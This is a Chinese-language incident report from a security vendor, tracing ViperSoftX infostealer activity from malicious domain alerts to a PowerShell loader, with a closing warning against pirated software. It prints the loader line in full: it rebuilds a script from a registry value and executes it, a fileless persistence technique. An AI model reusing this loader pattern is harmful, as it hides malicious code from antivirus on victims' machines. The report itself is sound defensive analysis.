聚铭网络近期在一次对用户的现场安全运维过程中,利用聚铭下一代智慧安全运营中心(AISOC)监测到了若干恶意域名请求的异常行为。经取证后发现,该恶意软件名为ViperSoftX,具有多种混合恶意行为。聚铭网络相关产品报警如下:
图1 恶意域名响应请求报警
图2 恶意域名请求列表
经过查询后,可以看到此类域名已经被标注为恶意,下图是其中一个域名的相关情报:
图3 恶意域名情报信息
什么是ViperSoftX
ViperSoftX是一种信息窃取软件,主要功能为窃取加密货币、剪贴板,对受感染的机器进行指纹识别,以及下载和执行任意附加的攻击载荷或命令。ViperSoftX分发的一个有效载荷为特定的信息窃取器,其形式是基于Chromium的浏览器扩展。该恶意扩展通过获取受害者所访问页面的完全控制权限,利用浏览器中间人攻击(MITB)来篡改加密货币交易所上的API请求数据,从而控制加密货币交易。
此外,ViperSoftX还可以窃取受害者的剪贴板内容,篡改访问网站上的加密地址,使用MQTT向C&C服务器报告事件等。ViperSoftX主要通过Adobe Illustrator、Corel Video Studio、Microsoft Office等破解软件进行传播。
ViperSoftX的攻击链可以总结为以下流程:
图4 ViperSoftX的攻击链示意
取证过程
在了解了整个攻击过程后,通过聚铭下一代智慧安全运营中心(AISOC)的取证工具就可以比较轻松地掌握是哪个进程执行了这些域名请求。通过运行取证工具,可以明显地看到一个Powershell脚本正在执行,如下图所示:
图5 脚本执行命令截图(通过取证工具获取)
可以看出,这个PS脚本位于“C:\Windows\System32\”路径下,打开它能看到如下内容:
$hWoZcYCHbzD=[ScriptBlock];$OYjdrEDOZG=[string];$QSIVJlVifNVF=[char]; icm ($hWoZcYCHbzD::Create($OYjdrEDOZG::Join('', ((gp 'HKLM:\SOFTWARE\Khronos8OjteuI').'1NpPEtPF' | % { [char]$_ }))))
很明显,这个PowerShell执行的真正内容在“HKLM:\SOFTWARE\Khronos8OjteuI”中,如下图所示:
图6 被植入在注册表中的恶意程序脚本
可以看出受攻击机器的注册表信息已经被恶意修改,通过解码被写入注册表的内容后,获取到完整的恶意程序,其中关键部分如下:
图7 请求恶意域名部分
这里使用了一个三重循环,故最多可以变换出50个不同的域名(即2*5*5),以躲避相关安全设备的检测,但由于其使用的还是有限的域名池,因此在聚铭相关专业设备的帮助下能够较为容易地侦测出来。
结论
聚铭网络技术人员在现场取证的过程中了解到,客户被攻击主机其实安装了多种杀毒软件,但在执行查杀时没有发现任何报警,通过这一点可以充分说明ViperSoftX具有很强地隐蔽性(将其主要恶意部分放入了注册表值),一般的防护手段难以及时发现。
目前还未准确查明用户是如何被植入ViperSoftX的,但通过对其执行链的分析,推测可能是用户在上网时下载了包含恶意内容的软件,从而使主机受到感染。因此小铭哥提醒大家,在上网时要切记网络安全,请勿下载盗版软件,避免因一时疏忽成为黑客攻击的受害者。